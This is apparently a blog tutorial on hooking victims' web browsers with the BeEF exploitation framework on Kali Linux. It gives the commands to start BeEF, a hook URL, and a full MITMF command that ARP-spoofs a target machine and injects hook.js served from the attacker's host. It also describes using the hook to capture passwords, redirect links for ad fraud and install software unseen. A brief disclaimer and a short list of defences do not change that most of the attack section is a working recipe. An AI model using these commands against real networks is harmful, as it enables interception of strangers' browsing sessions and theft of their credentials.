Hook Any Web Browser

Share This:

If you like my work and don’t want to see ads help me fund this blog by becoming a Patron
use-beef-browser-exploitation-framework.1280x600The internet is one of the most widely used tools of the 21st century. And the most used tool to use it is a web browser.

It is true not all web browsers are created equal and some browsers are more insecure then others. But none of this matters to an attacker. Hackers have created the BEeF framework to easily attack users using any web browser.

BEeF stands for Browser Exploitation Framework. It detects what browser someone is using and attempts to find an exploit to use. Once it finds one it attempts to use it on the browser.

Disclaimer: The methods used in this post are illegal, and are shown specifically for educational purposes. I take no responsibility for how you choose to use the information I have provided to you.

The Attack

In order to hook a browser we need a few tools.

  • A computer (Obviously)
  • Kali Linux
  • A network with all ports opened
  • A fully functional brain

Kali Linux has many penetration tools meant to exploit vulnerabilities in networks and systems. One of the tools Kali Linux has is the BEeF Framework.

Starting BEeF

One of the first things we will need to do is start BEeF. To start BEeF we will need to issue the following commands as a root user in the Kali Terminal


cd /usr/share/beef-xss
./beef

Most of the time BEeF will listen to port 2000 and connects to port 3000. Of course when issuing the above commands it will tell you this. But it may be different depending on your configurations. For the sake of this article we will use that information I have provided you with.

Now that BEeF is running we simply need to give people a link to the running BEeF server. In this case it would be something similar to the following.


http://192.168.1.110:3000

Now an attacker may use a URL shortener to make it look more friendly. Like https://goo.gl/beef or the attacker may just by a domain name and point it to the IP address. But once people visit the BEeF Server their browser gets hooked.

After the browser has been hooked the attacker can login to his or her BEeF control panel found at http://192.168.1.110:3000/ui/panel see every browser visited the URL. And since those browser visited they are hooked.

With the hooked browser the attacker has full control over the users browsing session. Lets say the hooked user visits Google and searches for something. The attacker can make all search results use links that direct to any other site he or she wants.

For example the user types in how to cure cancer into Google. Thousands of results show up. The user does what he or she would normally do and clicks on one of the results to get information about the topic. But lets say the attacker has an account with AdFly. And wants to make a little extra money per click. The attacker can make each link that appears on every site direct to AdFly first before it goes to the actual site. This way every link the user clicks on the attacker makes money from.

Lets say the user goes to Facebook. The attacker will be able to see passwords emails status updates and everything. The attacker will even know the plugins installed on the users browser. The attacker can even download and install programs on the persons device without the user even knowing.

Hooking A Browser Without Visiting The Server

Lets assume we can’t get the person to visit the server. We can still hook their browser. By injecting BEeF’s hook into their browser. This is achieved by using MITMF along with the BEeF server running.

What we would need in this case is the following.

  • Running BEeF Server
  • MITMF (comes with Kali Linux)
  • ARP Spoof (comes with Kali Linux)
  • BEeF Hook (it is written in Javascript and can be found in the root of the BEeF server, hook.js)
  • The victims IP Address

Now lets assume the victims IP address is 192.168.1.112 and if that is the case we will use the following command as root with MITMF


mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.112 --inject --js-url http://192.168.1.110:3000/hook.js

If everything went well you have now injected the hook into the users web browser with out them knowing and without them doing anything. They didn’t even need to go to the BEeF server.

Protecting Yourself From The Attack

Preventing the attack is simple.

  • Make sure your operating system up to date
  • Make sure your internet security tools are up to date
  • Make sure your web browser is up to date
  • Install an AdBlocker on your web browser
  • Disable Javascript on your web browser (If your using Firefox you can install NoScript)
  • Don’t install browser plugins or addons you don’t trust
  • Make sure your web browser doesn’t save your browsing history
  • Make sure your web browser doesn’t remember your passwords
  • Use a VPN or a Proxy
  • Modify your systems hosts file

If you like my work and don’t want to see ads help me fund this blog by becoming a Patron